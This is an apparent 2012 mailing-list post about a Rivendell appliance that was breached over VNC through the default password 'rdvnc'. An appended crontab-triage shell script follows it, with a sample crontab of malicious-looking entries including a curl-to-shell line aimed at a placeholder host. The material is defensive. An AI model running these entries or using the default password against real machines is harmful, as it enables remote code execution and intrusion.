[RDD] security breach

Robert Jeffares jeffares.robert at gmail.com
Sun Nov 25 14:45:08 EST 2012


I have had an interesting attack from what my ISP says is a 'known'
source, which was made through the remote desktop to the RD server.

The password is rdvnc and I have never managed to figure out how to change it.

Anyway, this attacker logged in and managed to load some code which has
hijacked the root account, then modified the crontab to run a program
which the attacker attempted to install but failed because CentOS on
the appliance CD is missing a few files and the attacker was unable to
install them from the repository.  I have seen the missing file
message before but since everything is working I have ignored it.

Not sure how long this all took, but I discovered an open console window
on the server with a complete track of events, and log files on the VNC
server indicate this happened over some considerable time.

root has lost the ability to ls but can do most everything else.

Minor inconvenience bringing the backup system online, and now working on
securing the remote desktop so that it is port shifted and hopefully
we can add another layer of firewall security.

First problem in four years despite constant polling by various
parties for open ports on the broadband box. They had found the SSH
port shifted from 22, but the passwords held firm.

My fault for leaving this open.

There may be other appliance users who have left VNC ports open with
the default password, just waiting for a visit from this pia.

I have looked at the VNC password howto but it is not working for me
... or I am looking in the wrong place.

Robert Jeffares
Big Valley Radio
Thames
New Zealand
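A quick triage check for the kind of crontab tampering described in the post, added here as an example (it is not part of the original message or of the Rivendell project). It assumes the standard CentOS crontab locations named in the comments and runs on a constructed sample crontab:

```shell
#!/bin/sh
# Added example, not from the original post: print crontab entries whose command
# runs from a world-writable or hidden directory, or downloads and pipes straight
# into a shell. Typical use on the appliance (assumed standard CentOS paths):
#   crontab -l -u root | flag_crontab
#   cat /etc/crontab /etc/cron.d/* | flag_crontab

flag_crontab() {
  # drop comments and blank lines, then keep lines matching any suspicious pattern
  grep -vE '^[[:space:]]*(#|$)' |
  grep -E '(^|[[:space:]=])(/tmp|/dev/shm|/var/tmp)(/|[[:space:]]|$)|/\.[^/[:space:]]+/|(curl|wget)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)|base64[[:space:]]+(-d|--decode)'
}

# Constructed sample crontab: two benign entries followed by three suspicious ones.
# The hostname example.invalid is a placeholder, not a real indicator.
SAMPLE_CRONTAB='# m h dom mon dow command
0 2 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * /usr/local/bin/rdcatch-sync
* * * * * /tmp/.x/update >/dev/null 2>&1
@reboot cd /dev/shm && ./kworker
0 * * * * curl -s http://example.invalid/x.sh | sh'

# Number of flagged lines in the sample (expected: 3).
count_flagged() {
  printf '%s\n' "$SAMPLE_CRONTAB" | flag_crontab | wc -l | tr -d ' '
}

# Stand-alone run: show which sample entries get flagged.
printf '%s\n' "$SAMPLE_CRONTAB" | flag_crontab
```

Entries that pass the filter still deserve a look; the patterns only catch the common cases, so compare the output against a known-good copy of the crontab as well.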


More information about the Rivendell-dev mailing list